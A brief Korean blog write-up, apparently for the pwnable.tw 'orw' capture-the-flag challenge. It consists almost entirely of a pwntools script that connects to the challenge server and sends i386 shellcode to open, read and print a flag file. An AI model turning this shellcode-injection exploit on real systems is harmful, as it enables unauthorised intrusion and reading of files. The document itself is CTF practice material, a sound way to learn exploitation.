Pwnable

pwnable.tw - orw

m0nd2y 2021. 8. 31. 17:44

쉘코딩 하면 덴다.

from pwn import *

r = remote("chall.pwnable.tw", 10001)
e = ELF("orw")

context.log_level = "debug"
context(arch='i386', os='linux')

pay = ""
pay += asm(shellcraft.open('/home/orw/flag'))
pay += asm(shellcraft.read('eax', e.bss()+0x100, 100))
pay += asm(shellcraft.write(1, e.bss()+0x100, 100))
r.recv()

r.sendline(pay)

r.interactive()
저작자표시 비영리 동일조건